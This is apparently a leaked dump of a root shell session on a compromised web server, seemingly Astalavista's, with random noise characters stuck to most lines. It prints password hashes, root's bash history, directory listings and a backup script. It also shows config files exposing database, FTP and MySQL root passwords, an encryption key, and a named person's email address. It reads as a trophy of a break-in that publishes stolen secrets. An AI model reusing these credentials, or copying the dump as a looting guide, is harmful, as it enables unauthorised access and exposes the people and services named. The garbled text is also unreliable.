4 ~6 X" G0 }/ |; Z- l' C: G& ~: ^3 Yadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::! }3 R# @: {! f8 S
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::3 P" @% T9 y ?2 {: _
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::9 z& _; E2 H5 Q% `; x1 q
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::% V9 F; G3 u; e' ]$ Z2 L3 q
0 L) `6 U: j |
sh-3.2# cat /etc/motd5 A( V- ^ y7 F
#####################################################
* L, O* ]9 ]9 h+ G! V- R9 k#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #4 S! s% U; Y/ a
# |__| [__ | |__| | |__| | | | [__ | |__| #* V9 F9 y( T5 c% ?7 i0 U) ~* x
# | | ___] | | | |___ | | \/ | ___] | | | #
7 G+ U+ X$ _5 Z5 B8 D9 o# ## O& e( `% f9 Q- |( p% a% U
#####################################################' f$ D3 p- d1 S l, u: m
# #1 ?* m" c x" n8 D" N$ L( Q' R
# Admin Contact - 链接标记support@secureservertech.com #
4 v6 v) ` `4 u5 ]# #
: s/ ?5 p5 s# y; a% q; h1 L. A B0 R# Available ShortCuts #
% B9 g8 J$ D! x* v* A/ g9 Q9 k) w# #
p1 z: S! E( n8 ?+ W; E# nst - list active connections #! ^- O# J0 H: O/ ]2 ?$ `
# ddos - shows how many times each ip is connected #
8 t& L+ q }. k# V9 r# ltr - restart the webserver #; ^- I# Z7 Y5 p! {* M' R/ f
# phpc - edit the php config file #
3 [2 \1 K2 c2 L. }4 F/ o2 z# htc - edit the webserver configuration file #0 y* t: n3 J( ^5 ~. T1 j
# up - uptime #" R. p3 e' i' T
# etd - edit the motd of the day file #. k' M. @8 U4 a6 R- q( y) i0 `
# htr - start and restart apache if needed #8 J8 G. d3 p5 {7 q# N) u% p
# syng - shows active SYN_RECV connections #
1 Z. K! B7 J) i' b4 \# synd - syn flood blocker - “synd -h” for usage #
) i" P1 A: j. X. T1 Y#####################################################
) C3 G" [6 [+ o& R* S# NOTES: #: {5 g1 j& p8 d3 G' Y, C1 _- {
# Last Upgrade - 12-08-2008 by JF #
2 P3 Y; O, L' d8 l& D6 Y# My.cnf/Mysql Optimization - 1-28-09 #
+ A2 m$ l1 |1 U: g# #: h, J+ q+ ?2 a$ `7 Q! h* u
# #
6 @0 p, e5 h5 B, l# #
. ^0 @: R' H9 W" B7 j4 m5 f8 {#####################################################
6 P3 u$ i( N/ a1 J
& @5 F0 O- Y+ x ish-3.2# lastlog | grep -v Never
9 Y% y* p* e8 X! u$ HUsername Port From Latest
7 U/ T: o, x2 X6 H! e* V5 _root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009( ?- k; d7 S5 o. E% y$ ?/ q
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008" N' M% J Q! b8 M' M% a* J
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20099 k, z: k8 ]8 l- m
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20094 [0 B& v& S$ u7 |+ t$ ]0 ]
$ T U+ F. M6 ]/ e/ Wsh-3.2# ls -la
" k' N8 |3 g# ^9 |% Ztotal 453376
a& C9 ^* w4 l+ D% M7 odrwxr-x— 15 root root 4096 Jun 4 08:40 .
2 w4 D/ [' C7 ^8 p% F* sdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..* e+ \7 C4 f. h* P# t
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
* V) y i( `8 x; C-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
6 Y3 H% v+ i6 U$ ~: _-rw——- 1 root root 16836 Jun 4 07:21 .bash_history! Q$ K/ n4 o4 @7 q( v) ]6 \- ^8 E$ i
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
. w/ v, o. v, i2 l$ a9 J-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
, x" x- _; [' B-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc; I% O! o! d, V1 c) E, `3 r0 k
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh# O: ^. j+ _, i7 R) y8 J7 ?
-rw-r–r– 1 root root 1327 Nov 29 2007 cert& Y) A/ O6 l( k$ y# g' P: k
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
9 G% ^ O6 G( N& f5 W& edrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
- ?' l$ m/ c, f0 M9 e4 ]-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc' {+ `* R- V: E
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql5 v, E( D. E* f2 z5 t
drwx—— 2 root root 4096 Oct 28 2007 .elinks8 y$ \2 i5 \/ v8 L
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
! U1 g' G) [/ s7 V. P+ R6 R-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
7 n4 h4 F/ Q$ \& ?9 c+ p-rw——- 1 root root 0 Apr 16 13:19 .history
7 _& W/ | `( g: Y1 {-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
% U- Z3 O4 J9 T& j+ T-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog- N( l, l+ y# R, J8 B7 V q K
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
! ?1 Q$ `+ i5 G6 k-rw——- 1 root root 35 Jun 2 14:23 .lesshst- w; }3 u, T2 {& A5 v9 w' Q0 O
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp+ v* T1 c2 p2 c4 I1 t* i
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec2 }5 N9 ]3 \& j r" O3 {( M; P
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
* d3 [( f: S2 E% D8 V5 Y-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2% v5 l% a6 u7 Z4 b
-rwx—— 1 root root 760 Sep 18 2008 lp
( b- ?, h/ |- D8 m. ~drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
$ F9 @; D# j- d8 b8 O' K-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
: t# g6 f% e: W& d& S" H* {! x-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
t9 Q7 B' Y6 W6 a- ^) @ q7 f. i3 `7 vdrwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.94 D2 y% s3 l8 i! n- m( j
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
% G; E1 i7 \: r/ Q) y& g6 adrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
2 x9 [' w( w, k1 Z5 n-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz4 i4 C6 b6 \; F0 Z6 s- H
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
4 Q0 x( q7 i8 L# ]' q-rw——- 1 root root 41 Oct 19 2007 .my.cnf* ?) ]) M% \3 } G! b' S3 s% T9 D
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
) H( F& f+ c( E' j3 a-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport4 w. s3 r/ Q0 i* }) V6 h* l
-rw——- 1 root root 41 May 20 2008 .mytop
L# |: i; g! kdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
) {, g$ S" d- ~3 D+ p( `' X/ M-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz3 {" u% ^; W! {
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
- q, k' i" t/ w/ I& Z8 g-rw——- 1 root root 1462 Sep 21 2007 opt.php9 d' i8 O N* X8 }3 M
-rw-r–r– 1 root root 3371 Sep 22 2007 p
) C! Y' e, K) E" k7 W1 O/ Z9 [-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2; |: Y5 w9 t/ W8 k# ]5 V @
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
: v. L1 ~8 `2 J& u8 x+ h; m-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
0 `" R5 @ i* O( r1 {5 a-rw-r–r– 1 root root 887 Nov 28 2007 server.key
# B5 i& d& Y4 q- x0 ddrwx—— 2 root root 4096 Oct 10 2008 .ssh
' u3 |5 |# N) t, o6 `+ M8 Q) \-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
! p5 Z. p2 c6 c-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
2 [( J# V: L$ t$ V. ?5 V-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
0 [& L% U1 p! ~4 x! t-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.16 L% {% }: G. H/ G: _2 V" m1 b
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
" |5 J, }! O3 B1 @-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
' u; t6 J7 T+ b$ ^drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
% X( t B! ^% x5 e6 c6 }-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz23 ?& p6 i6 `8 I0 S
-rw——- 1 root root 12997 May 16 2008 .viminfo9 o& e' k. d4 S2 A6 T
& g) w5 I0 i& |5 l) V% s& rsh-3.2# cat .bash_history
6 ?7 {6 Z8 D0 w4 M1 ~4 ]. ~[snip]
, @8 F7 ]5 V% u/ d/ q; N6 ]wget cp4sst.com/sstlinux.tar.gz
4 g) }4 O' O' M0 Etar zxvf sstlinux.tar.gz
& S' j2 `) ~' ]cd linux-2.6.27.104 ^1 }; o' e# m, f
sh install.sh
; a8 b$ ^$ T2 W, P% E# o, `! [6 Y, y6 Bmake bzImage ; make modules ; make modules_install ; make install8 E5 g0 p% o" _( D1 L/ X
make clean
. Z- k4 a \1 fservice mysqld restart
- M, w& T$ S7 i[snip]! E. e, W: c6 j. Q# o
cd /usr/sbin/
! o' h7 [% r5 y/ ~" b R6 Zchmod 4777 traceroute4 a+ Q# g% }( @5 U, P( P
chmod 4777 ping
) F/ T* [$ [- U8 ] t- P$ d, ntraceroute -I 链接标记[url]www.astalavista.ch[/url]
( I) a) ^ T4 V5 ~[snip]
5 e. I' {0 P, C* Pvi /etc/csf/csf.conf9 o7 y" h# J$ ~9 [
traceroute google.ch2 P. y" a; @" e1 z. f1 b
service csf restart
( c5 P6 b2 R! B0 i* ]8 \! g, otracert google.ch" S# x- n- ^- I. f
service csf restart
) ]! \7 { r9 O; k) btraceroute 链接标记[url]www.google.ch[/url]7 c6 |5 h, ]. @! I) k) n2 h' P
tracert 链接标记[url]www.google.ch[/url]+ K2 s( O: L- |% A/ i. t0 g
traceroute 链接标记[url]www.google.ch[/url]
* r( K% P! _% z+ o% g/ L& E slocate traceroute' e% k: x7 f1 V: Z7 y6 C! M4 n
chown 4755 /bin/traceroute
* a8 Y5 ?( G! n/ C3 Cchown 4777 /bin/traceroute: c0 N6 h) o: K) d
locate ping
9 v- i" n: C5 g/ W6 o* T$ S' C0 c5 Rchown 4755 /bin/ping# ~2 E& Z' X' H7 ~5 l% Z6 h9 s
chown 4777 /bin/ping
) J5 B3 v' ^1 }: `+ b" lcd /bin/
( n0 }% j- }: qls -ali | grep ping i. s9 M8 {: a" T1 F
chown root ping7 {% H4 J4 |+ t+ x1 p5 I3 ?0 W
chmod 4755 ping
. V% }. j# p1 c# A1 j+ k6 Rls -ali | grep traceroute
0 n/ \$ |( s5 V% Ychown root traceroute
* S1 l4 k* C; |chmod 4755 traceroute
# O/ ~* w2 d7 @ l/ I {) |$ Jls -ali | grep traceroute
) K9 l% q+ q1 s* Y/ Atraceroute -I 链接标记[url]www.google.ch[/url]
) W( v$ F& I5 A( e: Ztraceroute 链接标记[url]www.google.ch[/url]: `. p: |* M) G: N
whois pmsantos.ch# e+ {+ Q, Y6 `) {2 E3 G
[snip]
: x% r! q* P+ @' ^7 W r3 Jmysql -h com_contrexx2_live < /root/defaultp_ports.sql: z' ?- I- D$ W% U/ r. ^+ z
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
6 w3 Y# Y8 j- ]8 [' |mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
8 H, c+ p4 o& d4 a* p" z6 Emysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql! @9 f8 y; {9 b9 L2 O' ?' k: U! [
top
5 K( h+ `9 ]! `: Q8 f9 D; }0 _ping ssth.ch3 S& c L' s; Z1 k
ping asdlkfaljgasd???ljg???lasj.ch
1 y* x0 @9 _2 \& uping asdlkfaljgasdlasj.ch
/ q" u% z3 `2 b4 Y0 rping 链接标记[url]www.ssth.ch[/url]7 B$ o) i# r0 E
ping ssth.ch f( }; A" p4 {+ k+ ?) P+ e7 ~. ~* ]
nslookup 链接标记[url]www.google.ch[/url]
9 }. B, {/ x6 O0 H+ u: S3 o; Enslookup 链接标记[url]www.ssth.ch[/url]
2 A/ C* v' q) `% @% e9 Kman nslookup& x4 ?% @9 B$ w0 l
ping 链接标记[url]www.google.ch[/url]
3 l# B- O' W! x3 h& i# X8 Vnslookup 链接标记[url]www.google.ch[/url]
K( x. P8 J. c& c( `7 vnslookup 链接标记[url]www.google.ch[/url], J! z9 V% A; u7 R9 p
nslookup salfjasdlf.ch( q. p6 U; {1 V4 L, X h) C
[snip]
5 X3 K# f' D U* O& eopenssl passwd -1 sadf
9 o5 [; d) e. topenssl passwd -1 5cZNHstdTy
- r3 s# Q- q9 \& j' |4 M( jmysql
2 X1 F$ k6 E* a. nmysql
$ q! Q* E! n0 l1 O7 Y/ L6 dlocate proftp
% C- R- @' G) D5 U3 pvi /etc/proftpd.passwd
& V2 z. ` c- n+ Aservice proftpd restart( `# @5 q: Y/ e; y% W2 M) k
locate proftpd.conf
3 J& X' v* a% r6 q3 O' m. _3 Xvi /etc/proftpd.conf
7 ?. n* m* A3 w+ D, `9 |) ?vi /etc/proftpd.passwd7 D9 i/ I( g2 z) \+ ]
service proftpd restart
6 C( m) i# T8 x* G& J7 G[snip]% a4 g6 j) `4 ?9 m
/bin/sh /home/com/backup_system/backup.sh
+ b; ?9 x" }/ q, `tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin" I& ~2 y0 }; v6 o1 G
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql$ X1 ?, l, Z0 K* u4 f5 a
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql5 l: L2 {; O& D0 U# C" @: y" L
ls -ali4 e/ M; \ _7 o) {
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
' z* R% @2 Y3 N$ t* y' J9 K& n* Q9 mmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql8 S' e5 o X$ H7 D
crontab -l. M: q) a8 i8 n5 a }; h/ b6 W
crontab -l% `% x. B; [9 x1 U8 x/ G. l3 o: x, W
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
+ b4 u, B" ]2 @8 B" r/home/com/public_html/modifications/cronjobs/exploits.sh
# t, r1 i G- _0 U: y$ @$ P) Kwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
9 _) @9 u9 I; ]$ Ytar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
8 w9 e1 w/ |1 o, qcd lsws-4.0.3) j+ a& M7 i: x) U% `
sh install.sh, H1 ]8 `! c1 ^; `
uptime
: Y7 e9 n" a% [6 F% vhdparm -tt /dev/sda; S' V" k% ]6 W- z* K* D: @
iostat; w. {* {# S4 O! C- T. G
yum install iostat
* ^% U |2 H$ `, Ziostat4 P5 h; |6 v/ f5 K6 h
whereis iostat
\. y6 u7 K; `+ N1 G1 w( Wyjm clean all3 L( N, q8 m& z( F" ^( }6 `
yum clean all ; yum -y update
3 J# S1 H- H4 O# N; I( _+ Uiostat
% N7 x& W1 Y0 ?1 U2 N! myum install systat
' d; r( k) \8 B3 X- ^ W% xrpm -qa | grep iostat3 Z# _2 w% `+ S- ~ `8 ^/ A% O
rpm -qa | grep sysstat
0 Q6 b0 s6 J% t& t% ?) Mrpm -qa | grep systat
' J5 W2 ?$ w* Q7 ]( H) mdmesg -c
2 [% c1 v6 u4 I1 L. e7 N* Zsysctl -p
7 I& d$ i( O: p9 duname -r; q7 A k) r" L% K, u7 h9 R2 j
cd /usr/src
' ]/ \, E8 y3 Y5 G% O. A3 q# dwget nix101.com/kernels/sstlinux.tar.gz6 l* f; F* k8 y: p6 M
shutdown -r now7 j1 A- M$ t) Z
nano -w /boot/grub/grub.conf
7 q; _1 `: N1 ^7 V" ?4 Y; u$ D m, f
sh-3.2# cat .my.cnf9 l+ Y/ ]$ z2 E- ~9 o3 z
[client]
# I l! U) N" u y. xuser=da_admin4 N% ~; H0 P3 a ]! F4 z$ s2 f
password=X9dctmRH
I: Z- T N: a/ d& y; J6 z
3 g: v' C4 ^* g- j$ z+ Psh-3.2# cat /home/com/backup_system/backup.sh. V# T1 I6 j# e7 r9 y; L
#!/bin/sh- Z" p- t, u9 Y3 `% [$ _+ ~/ L: g
#####################################################################
3 c. e( E3 f t$ ]* I# #7 }' N8 A' T% E
# incremental backup for astalavista.com #
- ^$ C t; Z. I% |- I# r2 P# #! d: O& i4 E* D: ^
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
* t. P& f1 b* j! M9 p- D# #
1 J! F+ G" I' n6 e* o: B#####################################################################
- J) s/ b" ]+ `' F5 ]- c" C3 `$ L9 h[snip]
7 l# L/ R; }6 q. f& MPROG_DIR=”/home/com/backup_system”;
; j1 i, S: |* jBACKUP_DIR=”/home/com/backups”;
$ n. N! l# E# i4 R. t. kDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
, k' J2 B4 V F) n+ s$ D2 D) X4 J4 H/ r# ftp for synology backup server
6 K5 _" |. i3 R0 R& a/ y5 i* u* zFTP_HOST=”212.254.194.163″;5 Y* s0 t; B8 |* c; q
FTP_PORT=”21″;. M/ k! e' h, x# i V* m; \
FTP_USER=”astalavista.com”;
# ~# l! |. m- ^3 pFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;1 h# }! w1 z0 ?- _: s* J) Q Z5 H
FTP_DIR=”/astalavista.com”;" s" @- O. l) z$ A, B
# database8 q/ g0 C1 v2 P
DB_HOST=”localhost”;
: ?! p/ h" G) w) Z4 g$ l: z5 ]DB_USER=”contrexxuser2″;, N2 x4 J3 x0 V1 ~" E
DB_PASS=”0fEYNZgXz1pKe”;# \& `. [$ a' `6 G5 J! \* l5 I+ ~
DB_DATABASE1=”com_contrexx2_live”;8 m' H- _. V2 X! n- b
DB_DATABASE2=”com_contrexx2″;
4 L2 D/ O P; ^# a% Z# f/ h3 X+ F[snip]9 _& |& u6 J3 n! j0 E
ftp -in $FTP_HOST $FTP_PORT <<EOF
" _: d+ V" |7 R9 x- Iquote USER $FTP_USER
1 F) ^1 z5 ~* D" ^3 squote PASS $FTP_PASS
# ~ ` t+ \( q" k$ a z3 E4 qcd $FTP_DIR2 |; D1 E9 E7 p, [! f
put $DB_FULLNAME-SQL_Dump.tar
. D2 R4 k5 {( c0 R! J6 \! _. P' ]put $BACKUP_FULLNAME-Public_HTML.tar, y5 r. W) J ~0 @( M
close
7 n7 _2 q# J" S% b1 l7 @2 a5 E1 xbye, R& p/ G8 J$ H6 h# h- m' l$ a
EOF
2 |; |. ^6 @2 y) p# A: c. u
" c) a0 r5 d5 v$ }1 Dsh-3.2# cd /home
8 G) O+ f8 c8 @5 msh-3.2# ls -la
. q2 z0 b* J, }, ototal 120: F4 ~% E; r& D: ^8 P* K
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .0 _- m+ ?+ W1 k: K5 Y* Z
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..# N+ F* P! K: t/ E
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin* G$ y R& s; G) G9 u8 @. z
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group1 h& ?0 }. Y7 u! ?- @9 [
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
) y/ g0 ?9 A- M3 y! mdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet9 ]$ j/ X1 i* Z4 \3 o
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup5 `* q" n1 x1 a3 F+ K1 E
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161. v$ F* A4 |2 P
drwx–x–x 10 com com 4096 Apr 28 12:40 com
/ H3 M2 w1 a# t( `6 ndrwxr-xr-x 2 root root 4096 May 17 2007 ftp
0 }% y: a6 P0 W: u# c4 k0 cdrwx—— 3 jon jon 4096 Sep 21 2007 jon
* c( D) U* e3 U4 V0 k; P& ~" i Ldrwx—— 2 root root 16384 Sep 11 2007 lost+found o R! C* t; J2 d8 c$ B
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
7 G0 c' w6 x$ S) w7 C" Kdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata8 j4 Y# |- R- ?6 D2 g3 ^
drwx—— 2 jon jon 4096 Sep 15 2007 test
3 Z+ X0 h& v6 T$ Kdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp8 U% V, `( I) _0 T4 {2 w9 H8 K1 E0 R
) i; T# ]( h! C) V, {! Z+ Osh-3.2# cd admin
7 _& ^; M* E, x* z# zsh-3.2# ls -la
; V7 K2 I: R+ U5 C( ]total 17358966 [) {( L/ U' j9 c I0 I
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
' E. R# f: N7 a# R' Sdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ../ Z8 g' g! o, d$ ?' q
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups0 Y1 G8 [- a+ d& \3 j2 U
drwx—— 2 admin admin 4096 Sep 28 2007 backups8 j6 R2 K1 ^% Z2 B; T$ V. u
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history5 J. F4 n+ x, b" c
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout. D# W- p. {, ]% x
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile) Y% n# m: m9 S& U0 F5 N0 Q
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc0 \4 H8 b5 F9 |2 @
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups/ Z* b: p+ Q' j
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
4 g* B2 | r7 {& u6 }, w+ v1 s5 Udrwxrwx— 3 admin mail 4096 Sep 21 2007 imap
. l0 C, `2 \! k( Y9 B3 W-rw-r–r– 1 root root 24 Sep 21 2007 info.php+ [4 Y6 t% ]) N6 g" g
drwx—— 2 admin admin 4096 Sep 21 2007 mail
; A0 d7 f1 y0 R7 @/ ]& A-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
( n# a: C! m: b# p-rw-r–r– 1 root root 887 Nov 28 2007 server.key
. o! U6 |) Z& u0 ^9 @3 s9 I-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow6 T: y# T7 w+ G u4 J# p
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz, P0 r7 }' u. w
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups. J* D; R( w$ q6 {" F
; |& z2 N% O* l8 e: ?9 |sh-3.2# ..% S1 ^' P: K$ i: C/ A2 A
sh-3.2# cd jon
5 G4 ^& O- H- B, @4 W' b" Ish-3.2# ls -la
7 i# U1 D. T. H/ W4 Ytotal 36
' @" A3 g- n1 Y* O0 bdrwx—— 3 jon jon 4096 Sep 21 2007 .% I4 [: H$ m8 y: l
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..7 H8 h0 t8 L9 p; M: S) ?1 }: q
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
* J4 }0 v5 B0 J-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
1 d# y+ R H$ `2 Y# l9 r-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile) I7 g& E: c" n# P6 X, M: P
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
7 p4 \: c2 Q0 \1 b" R-rw-r–r– 1 root root 24 Sep 21 2007 info.php+ X3 y& `: O! d; E8 f. W
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html C C, e# x# d( c7 ^' s+ p9 u
3 O3 H2 p; R; R; j/ `+ A5 C
sh-3.2# cd ..
+ i m, w. }: Z9 z, Q; Zsh-3.2# cd test7 p3 c k; n. f7 n- x
sh-3.2# ls -la
1 Z6 K: @7 A6 f! D9 mtotal 48; A& V7 F! m$ v* r1 g
drwx—— 2 jon jon 4096 Sep 15 2007 .
2 x0 p* h9 K5 r6 o3 U: ]drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
3 v8 }% h' `: b$ G5 @6 M-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
% K0 L$ @7 V$ l% P" q-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout! ]. Y' h) p" B% x8 {1 b
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
- _7 r" C4 E2 U7 E: v6 g/ b-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
Z5 Q# i9 }. S( o9 Rsh-3.2# cat .bash_history* `5 P7 T- l* h+ j2 d9 O) s
/usr/bin/mysqladmin -u root password PoliuJhytg67
: _3 e7 z' p2 l4 n# Y
9 \( H5 B2 n( x% A2 x, `4 msh-3.2# cd ..
o# ?! z2 w' B8 p; @sh-3.2# cd astanet
3 r. N" }8 L( W9 Ush-3.2# ls -la& k/ Z( v N4 i9 U
total 52! a: v- f8 g" y2 O! W
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .0 x* K$ R% {" b E2 U! Y# r; y
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..6 X; n* U! Z& k. G8 K
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth& U/ K! g9 F) d6 k3 e- \4 u
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history. n: k- t& K; i% t' e
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout3 B4 k( u! Z; J
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
3 @7 ?6 e+ \- H- r1 ]5 q-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc+ r6 ~; G$ S" t( D
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
# ]# e* [% a9 V! V! K0 K; Y+ w8 o" ~drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
# @8 R" v+ ^% c5 d0 X/ S/ Pdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
# p! ~) M& \ c8 K-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history0 z4 I) }3 |8 B3 g3 I( L4 w0 r! V
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html: C5 D3 e8 F U; F O! E
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow4 o- F$ s: Z1 m5 m4 I! q# Q
- T" J N8 c* ^7 Q# z+ k
sh-3.2# cd auth/
: [# r+ a1 G, b) Gsh-3.2# ls -la
$ {. r. k$ i; K7 v' Atotal 28
" S1 W: ]9 T, t7 p3 i# b% _drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
; b3 \+ x7 ~4 v: [. }/ Ddrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
$ \& Y) f* L/ M) R' c3 H-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php" W, H$ j$ x; B& b3 v
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php7 \0 N3 U+ A4 Y/ [# R9 L
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
( v! R1 w+ [2 c8 |-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
2 n4 h: J0 F6 y8 n/ `# m-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
/ P. `! p6 R4 a* E* X3 ]
7 ?# S$ w6 Y6 H( f' u. D* y* Psh-3.2# cat hackercontest.config.inc.php
$ u; D2 |1 Z% ]$ K7 D& f<?PHP
2 x7 G" Y6 y# o0 G" {// Variabeln f?r Verbindung zur Datenbank //
* K6 I% `! q- c( T" Y% B$conxHost = ‘localhost’; // MySQL hostname
, u8 v, F$ I! {% T; }$conxUser = ‘hackercontest’; // MySQL user
6 p1 @' R! \* }+ d$conxPassword = ‘K6m@7dUc’; // MySQL password
6 O" I5 x2 J* D$ I9 U) N) [0 }" g$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
( m6 | a* m; K?>
( k7 Q) `# S6 z L. V- u. osh-3.2# cat hosting.config.inc.php
4 @6 O% x% z/ P/ H& v<?PHP
& U# c6 n; t. ~# B V// Variabeln f?r Verbindung zur Datenbank //
